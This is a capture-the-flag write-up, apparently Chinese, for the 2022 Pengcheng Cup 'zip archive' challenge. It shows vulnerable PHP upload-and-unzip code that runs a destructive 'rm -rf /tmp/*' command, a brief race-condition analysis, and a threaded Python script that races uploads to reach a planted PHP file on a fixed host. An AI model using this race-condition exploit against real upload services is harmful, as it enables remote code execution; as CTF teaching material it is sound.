[鹏城杯 2022]压缩包
<?php
highlight_file(__FILE__);
function removedir($dir){
$list= scandir($dir);
foreach ($list as $value) {
if(is_file($dir.'/'.$value)){
unlink($dir.'/'.$value);
}else if($value!="."&&$value!=".."){
removedir($dir.'/'.$value);
}
}
}
function unzip($filename){
$result = [];
$zip = new ZipArchive();
$zip->open($filename);
$dir = $_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename);
if(!is_dir($dir)){
mkdir($dir);
}
if($zip->extractTo($dir)){
foreach (scandir($dir) as $value) {
$file_ext=strrchr($value, '.');
$file_ext=strtolower($file_ext); //转换为小写
$file_ext=str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext=trim($file_ext); //收尾去空
if(is_dir($dir."/".$value)&&$value!="."&&$value!=".."){
removedir($dir);
}
if(!preg_match("/jpg|png|gif|jpeg/is",$file_ext)){
if(is_file($dir."/".$value)){
unlink($dir."/".$value);
}else{
if($value!="."&&$value!="..")
array_push($result,$value);
}
}
}
$zip->close();
unlink($filename);
return json_encode($result);
}else{
return false;
}
}
$content= $_REQUEST['content'];
shell_exec('rm -rf /tmp/*');
$fpath ="/tmp/".md5($content);
file_put_contents($fpath, base64_decode($content));
echo unzip($fpath);
?>
源码分析
可以通过connect写入内容,在解压到TMP目录时候,在unlink删除之前,访问就可以达到条件竞争
import requests
import hashlib
import threading
import base64
url = "http://1.14.71.254:28755/"
sess=requests.session()
r = open("1.zip", "rb").read()
content = base64.b64encode(r)
data={
'content': content
}
m=hashlib.md5(content)
md=hashlib.md5(('/tmp/'+str(m.digest().hex())).encode())
def write(session):
while True:
resp=session.post(url,data=data)
def read(session):
while True:
resp=session.get(url+f'static/upload/{md}/1.php')
if resp.status_code==200:
print("success")
if __name__=="__main__":
event = threading.Event()
with requests.session() as session:
for i in range(1, 30):
threading.Thread(target=write, args=(session,)).start()
for i in range(1, 30):
threading.Thread(target=read, args=(session,)).start()
event.set()